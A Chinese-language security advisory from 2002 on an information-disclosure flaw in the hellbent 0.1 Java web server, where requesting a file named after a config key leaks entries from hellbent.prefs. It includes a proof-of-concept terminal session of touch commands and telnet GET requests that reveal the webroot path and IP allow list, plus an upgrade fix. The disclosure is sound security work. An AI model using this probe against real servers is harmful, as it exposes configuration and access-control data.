Joe Testa hellbent 存在信息泄露问题发布时间:2002-01-21 更新时间:2002-01-21 严重程度:中 威胁程度:服务器信息泄露 错误类型:访问验证错误 利用方式:服务器模式 BUGTRAQ ID:3909 受影响系统 Joe Testa hellbent 0.1详细描述 hellbent 是一款JAVA WEB服务程序。 hellbent 包含一文件称为'hellbent.prefs', 此文件包含WEB ROOT,访问路径 和错误日志以及IP访问控制列表。 如果用户建立以webroot为后缀名的文件,并提交GET请求,服务器就会返回相应 的参考条目。 如用户建立一index.webroot文件,并发送GET请求,hellbent会返回'hellbent.prefs' 中WEBROOT的信息条目。 测试代码 [jdog@ghettofied webroot]$ pwd /home/jdog/hellbent/webroot [jdog@ghettofied webroot]$ touch index.webroot [jdog@ghettofied webroot]$ telnet localhost 80 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. GET /index.webroot HTTP/0.9 200 OK Content-Length: 0 Content-Type: /home/jdog/hellbent/webroot/ Server: [ hellbent java webserver v0.1 ] Connection closed by foreign host. [jdog@ghettofied webroot]$ touch index.ipallow [jdog@ghettofied webroot]$ telnet localhost 80 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. GET /index.ipallow HTTP/0.9 200 OK Content-Length: 0 Content-Type: 129.21.*.*;127.0.0.1 Server: [ hellbent java webserver v0.1 ] Connection closed by foreign host. [jdog@ghettofied webroot]$ 解决方案 升级到0.11版本: Joe Testa hellbent 0.1: Joe Testa Upgrade hellbent_v011 http://hogs.rit.edu/~joet/code/hellbent_v011.zip 相关信息 Holger Zimmermann <zimpel@t-online.de> 参考:http://www.securityfocus.com/archive/1/251251 相关主页:http://hogs.rit.edu/~joet/code.html |
